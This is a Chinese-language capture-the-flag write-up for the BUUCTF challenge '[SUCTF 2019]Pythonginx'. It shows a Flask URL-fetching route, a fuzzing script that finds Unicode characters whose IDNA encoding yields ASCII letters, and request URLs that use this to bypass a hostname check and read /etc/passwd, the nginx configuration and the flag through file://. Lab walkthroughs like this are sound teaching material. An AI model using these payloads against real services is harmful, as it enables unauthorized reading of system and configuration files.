BUUCTF：[SUCTF 2019]Pythonginx-CFANZ编程社区

BUUCTF：[SUCTF 2019]Pythonginx_配置文件

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

BUUCTF：[SUCTF 2019]Pythonginx_nginx_02

BUUCTF：[SUCTF 2019]Pythonginx_nginx_03

对url参数的处理过程如下图所示

BUUCTF：[SUCTF 2019]Pythonginx_配置文件_04

利用点在这里urllib.request.urlopen(finalUrl).read()，只要前两次host != suctf.cc，第三次host == suctf.cc即可

BUUCTF：[SUCTF 2019]Pythonginx_nginx_05

而这利用的关键在于newhost.append(h.encode('idna').decode('utf-8'))

编码问题，Unicode的很多字符经过这样的一番编码处理都可以得到正常的字母，脚本fuzz

chars = ['s', 'u', 'c', 't', 'f']
for c in chars:
	for i in range(0x7f, 0x10FFFF):
		try:
			char_i = chr(i).encode('idna').decode('utf-8')
			if char_i == c:
				print('ASCII: {}   Unicode: {}    Number: {}'.format(c, chr(i), i))
		except:
			pass

BUUCTF：[SUCTF 2019]Pythonginx_BUUCTF_06

任意去一个替换['s', 'u', 'c', 't', 'f']其中一个即可绕过

/getUrl?url=file://𝑆uctf.cc/etc/passwd

BUUCTF：[SUCTF 2019]Pythonginx_配置文件_07

然后是找flag位置，比较无语的是的flag位置在Nginx的配置文件中

/getUrl?url=file://𝑆uctf.cc/usr/local/nginx/conf/nginx.conf

Nginx的配置文件网上位置有很多，这里能读取到的是/usr/local/nginx/conf/nginx.conf

BUUCTF：[SUCTF 2019]Pythonginx_Nginx_08

/getUrl?url=file://𝑆uctf.cc/usr/fffffflag

BUUCTF：[SUCTF 2019]Pythonginx_nginx_09